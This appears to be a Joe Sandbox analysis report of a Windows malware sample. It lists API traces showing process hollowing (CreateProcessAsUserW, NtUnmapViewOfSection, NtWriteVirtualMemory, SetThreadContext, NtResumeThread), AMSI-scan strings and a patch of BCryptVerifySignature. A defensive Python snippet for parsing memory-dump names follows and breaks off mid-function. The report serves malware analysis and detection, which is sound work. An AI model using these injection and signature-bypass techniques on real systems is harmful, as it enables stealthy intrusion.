                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                              • Instruction ID: fd91fa55b07adcbc3577f94af20023f3f2314dc50a97d5048b6fa49ed86e7cf2
                                                                                                                              • Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                              • Instruction Fuzzy Hash: D0A011AC0002022ABF0A222E002022A2022AEC0302388C8A882088A000AFBA8000A828
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028A1A03,?,028A1FC1), ref: 028A15E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: f24d81c1deb63dc907aaa0e6e28fb690562f64ea1fcab37cdcec6daf26d583e8
                                                                                                                              • Instruction ID: 86b275ce84cdb2ab24e566ca185678ebab0fb46da72c73fa5132bb2c65145570
                                                                                                                              • Opcode Fuzzy Hash: f24d81c1deb63dc907aaa0e6e28fb690562f64ea1fcab37cdcec6daf26d583e8
                                                                                                                              • Instruction Fuzzy Hash: 39F049F4F453008FEB06CF7999D83117AD6E789344F14867EDA09DB388EB71A4058B00
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028A1FC1), ref: 028A16A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 49112e15963b4e90484d5ddb07a101dcd39da2ba3019c6408a67643f604e4e71
                                                                                                                              • Instruction ID: 5cf3fb0b056f7f6cddc8be1c887b14961740774284767753053164ba50a119b0
                                                                                                                              • Opcode Fuzzy Hash: 49112e15963b4e90484d5ddb07a101dcd39da2ba3019c6408a67643f604e4e71
                                                                                                                              • Instruction Fuzzy Hash: CCF090B6B447996FE7119E5EACC4792BBE4FB45314F050139EA0CDB344D770A8108BD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 028A1704
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1263568516-0
                                                                                                                              • Opcode ID: 273fbe0c7a0f54742d86c1dbdecd157e50b29b4a9d0ae9a40cc0a4f9e6d49297
                                                                                                                              • Instruction ID: 49e108ab1e3a6d1a5f0b56d686b1ab9f2d64feab0edf4bce79ef02df5abb59a1
                                                                                                                              • Opcode Fuzzy Hash: 273fbe0c7a0f54742d86c1dbdecd157e50b29b4a9d0ae9a40cc0a4f9e6d49297
                                                                                                                              • Instruction Fuzzy Hash: E0E0727D300300AFF7105B7E4D88B12BBDCEB88364F240436F209CB292CBA0E8108B20
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                              • API String ID: 667068680-597814768
                                                                                                                              • Opcode ID: 54bbf133e3ff7d17c8c09ca93b0eb21640b3b2ebb52d0987ef4a6967de989f6c
                                                                                                                              • Instruction ID: 35144ea8255026396dfe0cf59032a273f3096793e785f3c96ad3a1b26665c7d7
                                                                                                                              • Opcode Fuzzy Hash: 54bbf133e3ff7d17c8c09ca93b0eb21640b3b2ebb52d0987ef4a6967de989f6c
                                                                                                                              • Instruction Fuzzy Hash: 1D31107CA456289FFF019F6DD8D5AA933A9BF02301F891959E119DF309E778A800CF12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02905398,02905388,OpenSession,02905360,028B9A30,ScanString,02905360), ref: 028B8446
                                                                                                                              • GetThreadContext.KERNEL32(00000000,029053DC,ScanString,02905360,028B9A30,UacInitialize,02905360,028B9A30,ScanBuffer,02905360,028B9A30,ScanBuffer,02905360,028B9A30,UacInitialize,02905360), ref: 028B87DF
                                                                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B0,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360), ref: 028B8A3C
                                                                                                                              • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B0,00000004,029054B8), ref: 028B8BB7
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,ScanBuffer,02905360), ref: 028B920B
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B4,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,00000000), ref: 028B937E
                                                                                                                              • SetThreadContext.KERNEL32(00000000,029053DC,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B4,00000004,029054B8), ref: 028B94F4
                                                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,029053DC,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B4), ref: 028B9501
                                                                                                                                • Part of subcall function 028B7AC0: LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC,ScanString,02905360,028B9A30), ref: 028B7AD2
                                                                                                                                • Part of subcall function 028B7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                                • Part of subcall function 028B7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize), ref: 028B7AF6
                                                                                                                                • Part of subcall function 028B7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC), ref: 028B7B05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                              • API String ID: 2533507481-2367850715
                                                                                                                              • Opcode ID: 23f597b360f2d4d5e08d9f9bface122fcff1e7ccd83d642db23fa7549d50b379
                                                                                                                              • Instruction ID: fe7fbf3b24c0e764e930d2f4f3a8c2d26aa57481fca2cb61a56ececc688fe4d0
                                                                                                                              • Opcode Fuzzy Hash: 23f597b360f2d4d5e08d9f9bface122fcff1e7ccd83d642db23fa7549d50b379
                                                                                                                              • Instruction Fuzzy Hash: CCE21D3DA402688FEF11EB68D890ADEB3B6AF46701F1084A5D109F7315DEB0AE55CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02905398,02905388,OpenSession,02905360,028B9A30,ScanString,02905360), ref: 028B8446
                                                                                                                              • GetThreadContext.KERNEL32(00000000,029053DC,ScanString,02905360,028B9A30,UacInitialize,02905360,028B9A30,ScanBuffer,02905360,028B9A30,ScanBuffer,02905360,028B9A30,UacInitialize,02905360), ref: 028B87DF
                                                                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B0,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360), ref: 028B8A3C
                                                                                                                              • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B0,00000004,029054B8), ref: 028B8BB7
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                              • API String ID: 3979268988-2367850715
                                                                                                                              • Opcode ID: b8ccc4dc5082f60e5546dba87ccb0e0556dbf13ee0a2d0a925f5e76bbba4c162
                                                                                                                              • Instruction ID: 1eaeb5bdd71886e64a803d18461de26f13b23c9e66304da19311fa006a356726
                                                                                                                              • Opcode Fuzzy Hash: b8ccc4dc5082f60e5546dba87ccb0e0556dbf13ee0a2d0a925f5e76bbba4c162
                                                                                                                              • Instruction Fuzzy Hash: 6BE22D3DA402688FEF11EB68D890ADEB3B6AF46701F1084A5D109F7315DEB0AE55CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A58E9
                                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028A5900
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 028A5930
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A5994
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59CA
                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59DD
                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59EF
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59FB
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000), ref: 028A5A2F
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0), ref: 028A5A3B
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028A5A5D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                              • API String ID: 3245196872-1565342463
                                                                                                                              • Opcode ID: 69a1836db758774e4f97431ab114cf3734f5496221e9299cd39ca520bb01773f
                                                                                                                              • Instruction ID: bce8ea04137743adcd3e6d46a0fc83cf55aae3e7e74b14f1ff5a948e99aa78e3
                                                                                                                              • Opcode Fuzzy Hash: 69a1836db758774e4f97431ab114cf3734f5496221e9299cd39ca520bb01773f
                                                                                                                              • Instruction Fuzzy Hash: C741847DE00618AFEB10DAE8CC98ADEB7BDAF08354F4845A5A549D7241EB34DB848F50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028A5BB9
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028A5BBF
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028A5BEA
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C31
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C41
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C69
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C79
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028A5C9F
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028A5CAF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1599918012-2375825460
                                                                                                                              • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                              • Instruction ID: 8d18b352065a0e8a42673f0ac409c46cc9551ed3099c871176fe71d951fc292c
                                                                                                                              • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                              • Instruction Fuzzy Hash: E33184BDE4011C2AFB25D6B8DC59BDEB6AD4B04380F4401A1D648E6185EF78DFC48F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 028B7A09
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B7A0F
                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 028B7A2D
                                                                                                                              Strings
                                                                                                                              • NtProtectVirtualMemory, xrefs: 028B79FF
                                                                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 028B7A04
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleMemoryModuleProcProtectVirtual
                                                                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                              • API String ID: 1550029230-1386159242
                                                                                                                              • Opcode ID: 90591f22956c196b4b1a74670a8b416062c07ed21b13690b7fa7a6cd5aee1f95
                                                                                                                              • Instruction ID: 7cf9c6c98b1f710dc06ea7dd283c6ee97b23285563b425f091f117c176ff8baf
                                                                                                                              • Opcode Fuzzy Hash: 90591f22956c196b4b1a74670a8b416062c07ed21b13690b7fa7a6cd5aee1f95
                                                                                                                              • Instruction Fuzzy Hash: CEE04FBE58020CAF9B40DEACDC81D8B37DCAB082007006405BA18D3305C670E9218F75
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028A7FB1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1705453755-0
                                                                                                                              • Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                              • Instruction ID: 87107804d636e5dd30f9ca3e9f410b2c44f759b8976a5eea7a115a1a17367d84
                                                                                                                              • Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                              • Instruction Fuzzy Hash: 331112B5E00209AFDB00CF9DC881DAFF7F9EFC8300B14C569A408E7254E6319E018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%
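
The Source File and Associated entries above name every memory dump after the region it was taken from: the base address, and three fields (0x20, 0x1000, 0x20000 for the code region at 028A1000) that read as the VirtualQuery Protect, State and Type values. The Python below is an added example, not Joe Sandbox tooling or the sample's code. It decodes those names into region metadata and flags executable regions that are not image-backed, which is exactly what a loader that maps a PE into private memory leaves behind ("based on PE: true" on a MEM_PRIVATE region). The field meanings (process index, snapshot index, dump id, base, Protect, State, Type, reserved) are an assumption that fits the values in this report.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) file names into region metadata.

Added example, not Joe Sandbox code. Field semantics are an assumption that
matches MEMORY_BASIC_INFORMATION (Protect, State, Type) and the values in
this report; the first three fields (process index, snapshot index, dump id)
are likewise assumed.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PROTECT_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<snap>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<extra>[0-9a-f]{8})\.sdmp$", re.I)


@dataclass(frozen=True)
class Region:
    process_index: int
    snapshot_index: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Low byte is the base protection; upper bits are modifiers such as PAGE_GUARD.
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [n for bit, n in PROTECT_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    @property
    def executable(self) -> bool:
        # All four PAGE_EXECUTE* values live in bits 4..7.
        return bool(self.protect & 0xF0)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == 0x1000000


def parse_sdmp_name(name: str) -> Region:
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
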